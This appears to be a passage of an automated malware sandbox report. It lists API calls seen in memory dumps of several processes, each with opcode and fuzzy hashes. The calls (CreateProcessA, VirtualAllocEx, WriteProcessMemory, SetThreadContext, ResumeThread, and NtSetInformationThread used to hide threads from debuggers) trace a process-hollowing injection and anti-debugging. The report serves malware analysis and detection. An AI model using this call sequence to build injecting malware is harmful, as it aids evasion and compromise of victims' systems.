                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: db5a25657d8db2fb8eac58be54464a67600c8191c513c2cbf39513989dd15397
                                        • Instruction ID: 64a565686438843eeaaa0c4029f304e7b1845571a173f1eff8e8af429bae3d83
                                        • Opcode Fuzzy Hash: db5a25657d8db2fb8eac58be54464a67600c8191c513c2cbf39513989dd15397
                                        • Instruction Fuzzy Hash: A9A17C71D002198FDF20CFA8C844BEEBBF2BF48315F1485AAE819A7250D7759989CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 014EFE36
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 313292c08493eee968fc8c98ae7350d41dde9aef9dfb3d2743214446e82b8ee4
                                        • Instruction ID: be00107264f0dbcce1a11b8484e9e4340ace5e655a3d1f9d3355a535c7192015
                                        • Opcode Fuzzy Hash: 313292c08493eee968fc8c98ae7350d41dde9aef9dfb3d2743214446e82b8ee4
                                        • Instruction Fuzzy Hash: 9C915C71D002198FDF24CF68C844BEEBBF2BB48315F1485AAE819A7350D7759989CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 06601299
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.774176927.0000000006600000.00000040.00000001.sdmp, Offset: 06600000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 48de59a384325e2ed6ba7950de79d721238a93e17f39c3372562d047e7948f15
                                        • Instruction ID: 7e1a3d7c31c20cc0977073b77d6b8fc339768abb0c949a29e5e946094d7e6725
                                        • Opcode Fuzzy Hash: 48de59a384325e2ed6ba7950de79d721238a93e17f39c3372562d047e7948f15
                                        • Instruction Fuzzy Hash: EDA127B5D001098FEB58DFE9D4847DEFBF2AF89354F18882AD012AB394D7399945CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 014EF408
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 1507a61b02253b7bdd6ac480cdda4d383748ef4b7a4c70f122090198b0686a22
                                        • Instruction ID: e908ece6fe3c3f09e64f8330d17f5036903eadefb78ba4c5b63898906c721c9a
                                        • Opcode Fuzzy Hash: 1507a61b02253b7bdd6ac480cdda4d383748ef4b7a4c70f122090198b0686a22
                                        • Instruction Fuzzy Hash: FC2146719003599FCB00CFA9C884BDEBBF5FF48314F00842AE919A7641C7B8A954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 014EF408
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 4c0ddf03b6456dd24a74c4410d6f37fc9d7c34083f9f8076aa99222936b3d79b
                                        • Instruction ID: 434e79a36c8443641f278ae62f4fb81f3082c391ca7245a16e8ba2a348451331
                                        • Opcode Fuzzy Hash: 4c0ddf03b6456dd24a74c4410d6f37fc9d7c34083f9f8076aa99222936b3d79b
                                        • Instruction Fuzzy Hash: 902124719003599FCB00CFA9C884BDEBBF5FF48314F10842AE919A7240C7B8A955CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 014EE456
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 2b7f6687628015c3596976baecc96e847a5bbede56ff222dcc9bb7e867dedb7e
                                        • Instruction ID: d54520602db1ff77ab0744db2906a875c44c06e44c455be30aafab1b447afa2a
                                        • Opcode Fuzzy Hash: 2b7f6687628015c3596976baecc96e847a5bbede56ff222dcc9bb7e867dedb7e
                                        • Instruction Fuzzy Hash: 1B214A719002488FDB10DFAAD488BEEBBF4EF48324F44842AD919B7240CB789945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 014EF6E8
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 8eae6cf5749bda49834413a138f0934c28eaf94fbae8dc116f15b9f022edea67
                                        • Instruction ID: f2a3b44226c83ff3a6a960e2686d8e7e96eaf809ae11069689ba7d44dbe300a1
                                        • Opcode Fuzzy Hash: 8eae6cf5749bda49834413a138f0934c28eaf94fbae8dc116f15b9f022edea67
                                        • Instruction Fuzzy Hash: C22136718003599FCF10CFAAC884ADEBBF5FF48324F54842EE919A7250C7799945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 014EE456
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 53bc2b809821222c155a531d383fcf7b65af9b2fbbebe890c9a2ca86791cf1cd
                                        • Instruction ID: a6fbf8633f25c091b0c84878293f747c17ffeffd6851240e630a7fd3f6cb16fd
                                        • Opcode Fuzzy Hash: 53bc2b809821222c155a531d383fcf7b65af9b2fbbebe890c9a2ca86791cf1cd
                                        • Instruction Fuzzy Hash: 2C210471D002098FDB10DFAAC4887EEBBF4AF48224F54842AD959B7640CB78A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 014EF6E8
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 00303201d2184532b43752b92a97d39ff5702609e4e718adfedface36db045c9
                                        • Instruction ID: 27d749b611cfb909ed8ef9366fca7d3fa5041ae6e1db2b6101261192cdb0e818
                                        • Opcode Fuzzy Hash: 00303201d2184532b43752b92a97d39ff5702609e4e718adfedface36db045c9
                                        • Instruction Fuzzy Hash: E92128719002499FCB00CFAAC884BDEBBF5FF48314F50842AE919A7250C7799955CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 014EF126
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: c194e6c7429dffc189bfc4eccf39edf5e0c4c144487033110079c1c883881d0f
                                        • Instruction ID: 5bdf772a92814ed79ce7c7222f0c3931bcf0ec004450e91ca7472b22b231759e
                                        • Opcode Fuzzy Hash: c194e6c7429dffc189bfc4eccf39edf5e0c4c144487033110079c1c883881d0f
                                        • Instruction Fuzzy Hash: CA1147719002489FCF10DFAAD848BDFFFF5EB49324F14842AE915A7250C7759954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.774176927.0000000006600000.00000040.00000001.sdmp, Offset: 06600000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 5b773516415074a4e9a9832f7895da1ffed3e22bb9d34712b5a8b0d3ac9c6537
                                        • Instruction ID: df35700e7c2c458cfce1ce8d829156f04ed4c4f0614c834911b2e48a98e89058
                                        • Opcode Fuzzy Hash: 5b773516415074a4e9a9832f7895da1ffed3e22bb9d34712b5a8b0d3ac9c6537
                                        • Instruction Fuzzy Hash: E11146B19043498FDB14DFAAD8487DFBBF8EB88324F14842AD519A7640CB75A945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 014EF126
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 1724dae1d903148b6c790f572b0f8a34ce3a75e202e33be4a4a2e03a64f207a4
                                        • Instruction ID: 397a6a1936079a8c994d29841a6e1d0ae199b7e0592b650c0e73897d0506103d
                                        • Opcode Fuzzy Hash: 1724dae1d903148b6c790f572b0f8a34ce3a75e202e33be4a4a2e03a64f207a4
                                        • Instruction Fuzzy Hash: C51126719002499FCF10DFAAC848BDFFBF5AB49324F14842AE515A7250C775A954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 014ECFAF
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: b4f2a33c9a1bab6c7a1bc0e4e212eb436d954bdc867eb54521fb1ca741db1202
                                        • Instruction ID: 60f3dde36e454bb170a5cb592fb78b79fb70702205b5790e924b4e4db8a2efe9
                                        • Opcode Fuzzy Hash: b4f2a33c9a1bab6c7a1bc0e4e212eb436d954bdc867eb54521fb1ca741db1202
                                        • Instruction Fuzzy Hash: D61125B18002098FCB10CF9AC488BDEFBF4EF48324F15842AE529A7750D779A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.774176927.0000000006600000.00000040.00000001.sdmp, Offset: 06600000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 52b08f3c33313330a489f11a772bd428a99c9eaa08bb3d715931c1b2edf9644e
                                        • Instruction ID: 33a7e755449f5f29a2632ced3e6c7ab3e0e48bde5018e7be84fc78077ce68f27
                                        • Opcode Fuzzy Hash: 52b08f3c33313330a489f11a772bd428a99c9eaa08bb3d715931c1b2edf9644e
                                        • Instruction Fuzzy Hash: BB1125B1D002488BDB14DFAAC4487DFFBF9AB88324F148429D519A7640CB79A944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 014ECFAF
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 6c8f18cf9d7239582b956f405201f79b2ff4a8783cf6943b0ba4a4fc10cb5e50
                                        • Instruction ID: 9771d8560c1e5084d8c26231a5d745473a2c8702562c47605012edd937002e3c
                                        • Opcode Fuzzy Hash: 6c8f18cf9d7239582b956f405201f79b2ff4a8783cf6943b0ba4a4fc10cb5e50
                                        • Instruction Fuzzy Hash: EB1136B18002098FCB10CF9AC488BDEFBF4EF48324F15842AD519A7740D779A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Executed Functions

                                        APIs
                                        • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,0192CDB7,00000000,00000000), ref: 0192CF08
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID:
                                        • API String ID: 4046476035-0
                                        • Opcode ID: 687fc2bd44c38be9fab421669bad3326b376caba16672a8012c566d8265e6ae3
                                        • Instruction ID: 7411bd02489f94c1d74e4b27d9b0c35aa9b5db5064a33b4070caa1b7968d7d68
                                        • Opcode Fuzzy Hash: 687fc2bd44c38be9fab421669bad3326b376caba16672a8012c566d8265e6ae3
                                        • Instruction Fuzzy Hash: 831104B69042199FCB10DF9AC488BDEFBF8FB88324F148419E559A7210D3B5A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0192FE36
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 196ac7c8ababa7bae2e3efa5c5c81f4e799fabd2be1e51568b90203934405a65
                                        • Instruction ID: 961f0674e9dfb97ab5164dc50124bb84fcef86dace8ffacc0c77213deb18be0a
                                        • Opcode Fuzzy Hash: 196ac7c8ababa7bae2e3efa5c5c81f4e799fabd2be1e51568b90203934405a65
                                        • Instruction Fuzzy Hash: F7A16D71D00229CFDF25CF68C880BEEBBB2BF48314F1485A9E859A7244DB749985CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0192FE36
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 3b8c80c4d118a9f3c3541d3dca8e13f7ea72a15b741edc598023f85efd85700c
                                        • Instruction ID: e9ee5fdb49d16a74b16838db4d06dcb33e4415d507f85b7581e4fe540b3f87cd
                                        • Opcode Fuzzy Hash: 3b8c80c4d118a9f3c3541d3dca8e13f7ea72a15b741edc598023f85efd85700c
                                        • Instruction Fuzzy Hash: EE915D71D00229CFDF25CF68C841BEEBBB6BF48314F1485A9E819A7244DB749985CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 05BF1299
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 2af13b2bca111579151b26a0fbafa1453783618d0f4dd9556d3020379d182c68
                                        • Instruction ID: fcdc7ed456bd3be0a464ae8e19cf3a157ada01444481433f8dbdfb5852cb4793
                                        • Opcode Fuzzy Hash: 2af13b2bca111579151b26a0fbafa1453783618d0f4dd9556d3020379d182c68
                                        • Instruction Fuzzy Hash: 02A11570E04109DBDB18DFA9D4847ACBBF2BF88354F188999D116BB390D775E849CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0192F408
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 3782281096e36b02ebf5eea377fb5820320fb740a57e7d1422f0def0d74e381a
                                        • Instruction ID: acacc7d9ef839c60200b66d72b81f6b6c5946184d8697655e24a9f68a0fb42e0
                                        • Opcode Fuzzy Hash: 3782281096e36b02ebf5eea377fb5820320fb740a57e7d1422f0def0d74e381a
                                        • Instruction Fuzzy Hash: B52157729003598FCF00CFA9C884BDEBBF5FF48314F00842AE919A7241C7B8A944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0192F408
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: abcaa0c7f0552be891c346d26ccc134e9ad36084ab91966438c5eb0e8d5c9859
                                        • Instruction ID: cd7b26e44443e823aa6024fd84dc23d03e32b3f8989f2fa9fe074562dfb9ace4
                                        • Opcode Fuzzy Hash: abcaa0c7f0552be891c346d26ccc134e9ad36084ab91966438c5eb0e8d5c9859
                                        • Instruction Fuzzy Hash: 752139769003199FCF00CFA9C884BDEBBF5FF48314F00842AE919A7240D7B8A955CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetThreadContext.KERNELBASE(?,00000000), ref: 0192E456
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 3cba7d04ffb4bc9fd7a067ab7c99c6d11040f877e44635e4ed005756673c7d90
                                        • Instruction ID: e9e547bfb2abb4e4f338c421441632aaeeb9e0b4528f905075bb88b3e88e0728
                                        • Opcode Fuzzy Hash: 3cba7d04ffb4bc9fd7a067ab7c99c6d11040f877e44635e4ed005756673c7d90
                                        • Instruction Fuzzy Hash: C6213772D043098FDB10CFAAC4847EEFBF4EF48224F548429D959A7240DB78A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0192F6E8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: f9331dbc55d55017af7c3f0d8c611b437894a82be64dd557fa57d31464926d57
                                        • Instruction ID: 461fe9d7f6966affb3550efee82a82accb736e0d8a50ee1ec3b6e230eaeef6c0
                                        • Opcode Fuzzy Hash: f9331dbc55d55017af7c3f0d8c611b437894a82be64dd557fa57d31464926d57
                                        • Instruction Fuzzy Hash: AB2116719003599FCB10CFAAC884BDEBBF5FF48314F14882AE919A7240D7799945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetThreadContext.KERNELBASE(?,00000000), ref: 0192E456
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 0c265619512827542061cfe1d78aa34a34cc2e7ae013f191b20e4d0f39c9f41d
                                        • Instruction ID: 6661efefb4e997f46374a4a7f6c9eee68c934c54b851cf5fe2bfbd24d8971b6f
                                        • Opcode Fuzzy Hash: 0c265619512827542061cfe1d78aa34a34cc2e7ae013f191b20e4d0f39c9f41d
                                        • Instruction Fuzzy Hash: E32115719043198FDB10DFAAC4847EEBBF4EF88324F54C42AD959A7240DB78A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0192F6E8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: ac7fec9af825ab2142fb86882e7a61c68b7b354756ad474dc1e9d3eb3a06e19e
                                        • Instruction ID: 1e44aca1e3499597ab6705046fe2297cbdf07c6e4b6ee9c5b2e03f875496093d
                                        • Opcode Fuzzy Hash: ac7fec9af825ab2142fb86882e7a61c68b7b354756ad474dc1e9d3eb3a06e19e
                                        • Instruction Fuzzy Hash: D72128719003199FCB10CFA9C884BDEFBF5FF48314F108429E919A7240D7799945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 05BF11EE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: KernelObjectSecurity
                                        • String ID:
                                        • API String ID: 3015937269-0
                                        • Opcode ID: 9382923a25c0ea62c939bfe1b9b0517811ef40611ac591cb4ca52204e07f83c0
                                        • Instruction ID: abfa89dc68f7118fcd3051449f11d03c02819e107f419eeab66efe8e9306f8a1
                                        • Opcode Fuzzy Hash: 9382923a25c0ea62c939bfe1b9b0517811ef40611ac591cb4ca52204e07f83c0
                                        • Instruction Fuzzy Hash: 3921F7B29042499FCB10CF9AC585BDEBBF4FB88324F148429E519A7340D778A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0192F126
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: ed1069ae46d83b6fc08700f49564dfccb2c228fdeadd6e6298a6996ea9dcb856
                                        • Instruction ID: 466100505daee3d2f89e8e4316d9d9619f1e0f5f396b674d1fbf4e4368af5b15
                                        • Opcode Fuzzy Hash: ed1069ae46d83b6fc08700f49564dfccb2c228fdeadd6e6298a6996ea9dcb856
                                        • Instruction Fuzzy Hash: B11144729002499BCF10CFA9C848BDEFBF5AB49324F148829E919A7251C775A944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0192F126
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: beb3e6321401c6c030436740bff2bd98c14b529fb52ec4020245e01e0d3026c6
                                        • Instruction ID: 481b8fae51ede9d48175b2d41a29334642e7cd575a674b06f9df99f9652dcc0c
                                        • Opcode Fuzzy Hash: beb3e6321401c6c030436740bff2bd98c14b529fb52ec4020245e01e0d3026c6
                                        • Instruction Fuzzy Hash: 171126729002099FCF10DFA9C844BDEBBF5FB49324F148819E519A7250C775A954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 61abcc36c01b3410d1ba9d7105c2242d43b08b0c669008bbc3eec3b265cd5786
                                        • Instruction ID: 1dcc58410e6e84e0a2987dbc9536a31a757c1a8ac22652de5f7ec89d76b7ca7b
                                        • Opcode Fuzzy Hash: 61abcc36c01b3410d1ba9d7105c2242d43b08b0c669008bbc3eec3b265cd5786
                                        • Instruction Fuzzy Hash: 7F1158B6D042498FCB10DFA9C5487EEFBF4AF88224F148429D919A7240C774A945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 0192CFAF
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 38e58a31e9fd8d1d9187f4ccbd495c6ae05931f7894167cdb15fb49648180993
                                        • Instruction ID: 9bbb6f45aa91e49593ba911b1222c4eedc4f91fbaa9546acfeec2f211735a354
                                        • Opcode Fuzzy Hash: 38e58a31e9fd8d1d9187f4ccbd495c6ae05931f7894167cdb15fb49648180993
                                        • Instruction Fuzzy Hash: 0B1125B28002198FCB10CF99C448BDEFBF4EB48324F15842AD518A7340D778A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 2991aa57d1aafa7da93bc9ddce7e990fa0becca5e821ae83ccc40361d909a21a
                                        • Instruction ID: d22f33fe5a66408c971f13ec02a15d67ae4f2f2a6ebd4bd686a6c7402220d32d
                                        • Opcode Fuzzy Hash: 2991aa57d1aafa7da93bc9ddce7e990fa0becca5e821ae83ccc40361d909a21a
                                        • Instruction Fuzzy Hash: 6F1106B19043498FCB10DFAAC4487DEFBF9EF88224F148429D55AA7640CB79A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 0192CFAF
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 4bb9606265819123f00def4f0c5e8e2e0077960a992cf9f52cdb78563ede9557
                                        • Instruction ID: bc8a264d9be5bab43beb3b179d5b78f00d4f65385f2f1ac3f6ed126ef32a85de
                                        • Opcode Fuzzy Hash: 4bb9606265819123f00def4f0c5e8e2e0077960a992cf9f52cdb78563ede9557
                                        • Instruction Fuzzy Hash: 931113B68002198FCB10CF99C548BDEBBF4AB48324F15882AD568A7240D778A545CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Executed Functions

                                        APIs
                                        • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,0103CDB7,00000000,00000000), ref: 0103CF08
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID:
                                        • API String ID: 4046476035-0
                                        • Opcode ID: c22041ce9a1d7841f55156176417e0299f157b4f49b81ce93b0ee01b6457f847
                                        • Instruction ID: bddc24b6917711625060f9af03d9ceeefc9c90c0c84312f57a082d25ced84f5d
                                        • Opcode Fuzzy Hash: c22041ce9a1d7841f55156176417e0299f157b4f49b81ce93b0ee01b6457f847
                                        • Instruction Fuzzy Hash: 211104B59042089FDB10DF9AC988BDEBBF8FB88324F14841AE559B7210C375A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4171a7721dc7ebaae27cabbc8940f16a1f6775cc03e8d72829ec79757c7156a
                                        • Instruction ID: 31bc5a7968735d7cbc33698e5f8b5f8c2417aeb34af42c70e63d9226c2becac1
                                        • Opcode Fuzzy Hash: d4171a7721dc7ebaae27cabbc8940f16a1f6775cc03e8d72829ec79757c7156a
                                        • Instruction Fuzzy Hash: 171101303056118FD72AAB29D8E496ABBEAFFC675530801B8E506CF360CF20DC01C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0103FE36
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 25000d5e8ec920aeb50a58c7ef462729255f8fcf5a535c73b024eda13639c314
                                        • Instruction ID: 5f2d151a5ca956d34779f05fdd9e9de8690efb99a21ae386b3baf0f59de3ff69
                                        • Opcode Fuzzy Hash: 25000d5e8ec920aeb50a58c7ef462729255f8fcf5a535c73b024eda13639c314
                                        • Instruction Fuzzy Hash: 32A17C71D0021A8FDF10CF68C8457EDBBF6BF88314F1485A9E859A7240D7749985CF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0103FE36
